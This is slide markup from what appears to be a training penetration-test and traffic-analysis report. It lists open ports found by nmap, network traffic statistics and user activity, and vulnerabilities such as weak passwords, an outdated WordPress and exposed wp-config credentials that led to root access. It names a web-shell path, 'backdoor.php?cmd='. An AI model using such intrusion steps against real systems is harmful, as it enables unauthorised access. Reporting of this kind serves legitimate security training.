            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2713" name="Google Shape;2713;p18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714" name="Google Shape;2714;p182"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="14232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715" name="Google Shape;2715;p182"/>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1786625">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r>
              <a:tr h="1068275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>SSH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3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>open port 22/tcp OpenSSH </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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High</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131825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>HTTP</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open port 80/tcp</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High</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440975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>rcpbind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open port 111/tcp </a:t>
                      </a:r>
                      <a:endParaRPr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Medium</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872625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>netbios-ssn</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open port 139/tcp and port 445/tcp Samba smbd 3.X-4.X (workgroup: WORKGROUP)</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Medium</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481150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Command Injection Attack</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backdoor.php?cmd=</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High</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18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nmap scan of target 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2722" name="Google Shape;2722;p1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2723" name="Google Shape;2723;p183"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3121025" y="2680575"/>
            <a:ext cx="18135600" cy="9429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1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Command Injection Attack for Target 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2730" name="Google Shape;2730;p1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2731" name="Google Shape;2731;p184"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289900" y="11110950"/>
            <a:ext cx="21854131" cy="1843050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2732" name="Google Shape;2732;p184"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289900" y="2104450"/>
            <a:ext cx="21820925" cy="3314550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2733" name="Google Shape;2733;p184"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289900" y="5810625"/>
            <a:ext cx="21786411" cy="487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185"/>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39" name="Google Shape;2739;p1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1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Traffic Profile</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2745" name="Google Shape;2745;p1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746" name="Google Shape;2746;p186"/>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t>Our analysis identified the following characteristics of the traffic on the network: </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2747" name="Google Shape;2747;p186"/>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1786625">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Feature</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Value</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000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1068275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Top Talkers (IP Addresses)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3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>172.16.4.205 (26 bytes); 166.62.111.64 (16 bytes) </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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000"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Machines that sent the most traffic.</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131825">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Most Common Protocols</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UDP; TCP; HTTP</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000"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Three most common protocols on the network.</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247475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t># of Unique IP Addresses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808</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr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000"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Count of observed IP addresses.</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309800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Subnets</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255.255.255.0</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000"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Observed subnet ranges.</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481150">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 of Malware Species</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chemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>1 confirmed</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000"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Number of malware binaries identified in traffic.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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1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Behavioral Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2754" name="Google Shape;2754;p18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t>Purpose of Traffic on the Network</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2755" name="Google Shape;2755;p1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756" name="Google Shape;2756;p187"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="3424675"/>
            <a:ext cx="24377700" cy="9459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a:t>Users were observed engaging in the following kinds of activity.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Normal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t> Activity</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Watching YouTube</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Installing Desktop Backgrounds    </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Suspicious Activity</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Downloading Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set up AD network and domain controller (frank-n-ted.com)  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2757" name="Google Shape;2757;p187"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9837503" y="4121700"/>
            <a:ext cx="6258150" cy="3992925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2758" name="Google Shape;2758;p187"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288950" y="9924625"/>
            <a:ext cx="10543149" cy="2959050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2759" name="Google Shape;2759;p187"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12048575" y="9924626"/>
            <a:ext cx="11335850" cy="295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86" name="Google Shape;2386;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7" name="Google Shape;2387;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88" name="Google Shape;2388;p143"/>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1786625">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r>
              <a:tr h="2374600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Security Misconfiguration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3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Port 22 allowed unrestricted access. The port was left vulnerable to the internet. </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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We were able to set up a user shell logging in as Michael</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="3600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Caveat"/>
                        <a:ea typeface="Caveat"/>
                        <a:cs typeface="Caveat"/>
                        <a:sym typeface="Caveat"/>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276975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak password policy</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Password seemed to have no rules on complexity. Allowed guessing of Michael’s password</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Allowed access SSH into 192.168.1.110</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601850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Enumeration revealed a dated version of WordPress (v. 4.8.7)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Gained access to wp-config.php which revealed the credentials for SQL database showing username and password hashes</a:t>
                      </a:r>
                      <a:endParaRPr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Root access was gained, allowing further exploitation</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="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188"/>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65" name="Google Shape;2765;p1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1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YouTube-Behavior 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2772" name="Google Shape;2772;p1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2773" name="Google Shape;2773;p189"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216525" y="5339575"/>
            <a:ext cx="21945600" cy="5981700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2774" name="Google Shape;2774;p189"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2"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We discovered traffic to YouTube IP addresses using protocols </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP, HTTP, TLSv1.2</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The users sent packets to and from YouTube IP address 216.58.193.202</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1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Installing Desktop Background -Behavior 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2781" name="Google Shape;2781;p19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82" name="Google Shape;2782;p1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783" name="Google Shape;2783;p190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="3424675"/>
            <a:ext cx="24377700" cy="94590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SzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What kind of traffic did you observe? Which protocol(s)? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What, specifically, was the user doing? Which site were they browsing? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>They were browsing green.mattingsolutions.co </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>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Include a description of any interesting files. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
